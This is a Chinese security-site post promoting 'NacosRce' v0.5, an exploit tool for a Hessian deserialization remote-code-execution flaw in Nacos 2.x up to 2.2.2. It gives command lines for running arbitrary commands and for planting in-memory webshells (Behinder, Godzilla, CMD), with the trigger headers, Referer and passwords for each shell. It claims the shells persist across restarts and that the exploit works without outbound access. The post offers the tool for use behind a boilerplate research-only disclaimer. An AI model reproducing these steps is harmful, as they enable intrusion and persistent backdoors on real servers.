探索网络安全新技术
攀登黑客技术最高峰

Nacos Hessian 反序列化漏洞利用工具 v0.5

使用方法

自动注入内存马并执行命令 java -jar NacosRce.jar Url Jraft端口 “Command”

java -jar NacosRce.jar http://192.168.90.1:8848/nacos 7848 "whoami"

只注入内存马

java -jar NacosRce.jar http://192.168.90.1:8848/nacos 7848 memshell

内存马说明

一、冰蝎内存马

1、需要设置请求头x-client-data:rebeyond
2、设置Referer:https://www.google.com/
3、路径随意
4、密码rebeyond

Nacos Hessian 反序列化漏洞利用工具 v0.5-威武网安

二、哥斯拉内存马

1、需要设置请求头x-client-data:godzilla
2、设置Referer:https://www.google.com/
3、路径随意
4、密码是pass 和 key

Nacos Hessian 反序列化漏洞利用工具 v0.5-威武网安

三、CMD内存马

1、需要设置请求头x-client-data:cmd
2、设置Referer:https://www.google.com/
3、请求头cmd:要执行的命令

Nacos Hessian 反序列化漏洞利用工具 v0.5-威武网安

v0.5版本实现了

1、不出网漏洞利用
2、可多次发起漏洞利用
3、同时注入冰蝎/哥斯拉/CMD内存马
4、内存马对nacos多版本进行了兼容

Tips

1、请用jdk1.8
2、适用于 Nacos 2.x <= 2.2.2
3、非集群的也能打哦
4、此内存马重启nacos依然存活

关于Windows

如用下面的方式执行,注入内存马时会生成临时文件 C:\Windows\Temp\nacos_data_temp 和 C:\Windows\Temp\nacos_data_temp.class 文件

java -jar NacosRce.jar http://192.168.90.1:8848 7848 "whoami" windows

如果没有在最后加 windows,临时文件会在 /tmp/nacos_data_temp /tmp/nacos_data_temp.class,所以权限足够的话,不指定windows也能打成功 windows 没打成功也许是因为没权限操作C盘或其他原因

工具下载

NacosRce

其他推荐

哥斯拉Nacos后渗透插件

打赏
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《Nacos Hessian 反序列化漏洞利用工具 v0.5》
文章链接:https://www.wevul.com/1828.html
本站所有内容均来自互联网,只限个人技术研究,禁止商业用途,请下载后24小时内删除。

文章推荐

如果文章对您有帮助 请不要吝啬 打赏一下小站

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册